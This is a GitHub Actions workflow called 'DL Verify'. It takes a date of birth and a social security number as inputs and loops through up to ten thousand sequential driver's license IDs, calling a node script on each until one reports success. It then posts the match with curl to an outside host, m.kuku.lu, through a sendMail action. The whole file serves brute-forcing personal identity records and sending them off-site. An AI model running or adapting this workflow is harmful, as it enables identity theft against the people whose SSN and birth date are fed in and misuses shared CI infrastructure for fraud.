name: DL Verify
on:
  workflow_dispatch:
    inputs:
      start:
        required: true
      count:
        default: '10000'
        required: true
      dob:
        required: true
      ssn:
        required: true

jobs:
  verify:
    runs-on: ubuntu-18.04
    steps:
    - name: Checkout
      uses: actions/checkout@v2
      with:
        path: sndl
    - name: Run Script
      run: |
        cd sndl
        dlId=${{github.event.inputs.start}}
        for (( c=1; c<=${{github.event.inputs.count}}; c++ ))
        do
          output=$(node index ${dlId} ${{github.event.inputs.dob}} ${{github.event.inputs.ssn}})
          echo $output | grep Success && result=$output && break
          echo $output
          dlId=$((dlId+1))
        done
        if [ ! -z "$result" ]; then
          curl -s -X POST "https://m.kuku.lu/f.php" -H "Accept-Language: en-US,en;q=0.9" -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "h=3690c0ddc9" --data-urlencode "action=sendMail" --data-urlencode "data=$result"
        fi

